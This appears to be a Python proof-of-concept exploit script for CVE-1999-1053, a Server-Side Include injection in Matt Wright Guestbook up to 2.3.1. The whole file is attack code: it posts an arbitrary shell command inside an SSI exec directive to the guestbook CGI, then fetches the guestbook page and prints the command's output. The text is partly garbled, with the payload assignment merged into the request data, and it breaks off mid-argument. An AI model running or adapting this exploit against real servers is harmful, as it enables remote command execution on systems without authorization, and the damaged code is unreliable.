#!/usr/bin/env python3 import requests import string import random import argparse from bs4 import BeautifulSoup from colorama import Fore, init def banner(): print(f'+{"-" * 15}Banner{"-" * 15}+') print(Fore.YELLOW + '''Author: siunam (https://siunam321.github.io/) Original author: Patrick Original Exploit-DB exploit script: https://www.exploit-db.com/exploits/9907 CVE ID: CVE-1999-1053 Description: CVE-1999-1053 Server-Side Include injection vulnerability in Matt Wright Guestbook <= 2.3.1''') print(f'+{"-" * 15}Banner{"-" * 15}+') def main(url, payload): # Server-Side Include exec payload ssi_exec = '', 'comments': f'''{ssi_exec}"{payload}"''' } # Try to send the payload try: print(f'[+] Sending the payload: {payload}') requests.post(url + '/cgi-bin/guestbook.pl', data=data) except: print('[-] Unable to send the payload...') print('[-] Maybe the target doesn\'t enable guestbook.pl script and Server-Side Include (SSI) script handler enabled for the .html file type??') # Try to trigger the payload try: print(f'[+] Triggering the payload...') get_req = requests.get(url + '/guestbook.html') soup = BeautifulSoup(get_req.text, 'html.parser') # Find the latest comment in the guestbook, which is the payload output print('[+] The output on the guestbook:') print(f'+{"-" * 15}Output{"-" * 15}+') # Find the first tag text, and split the UTC date result = soup.find('b').getText().split(' - ') print(Fore.RED + result[0].strip()) print(f'+{"-" * 15}Output{"-" * 15}+') except: print('[-] Unable to trigger the payload...') if __name__ == '__main__': # Parsing arguments parser = argparse.ArgumentParser(description='A Proof-of-Concept(PoC) Python3 script to exploit CVE-1999-1053 Server-Side Include injection vulnerability in Matt Wright Guestbook <= 2.3.1') parser.add_argument('-u', '--url', type=str, required=True, help='Target full URL. E.g: http://domain.here/') parser.add_argument('-p', '--payload', type=str, required=True, help='Payload. Default SSI payload: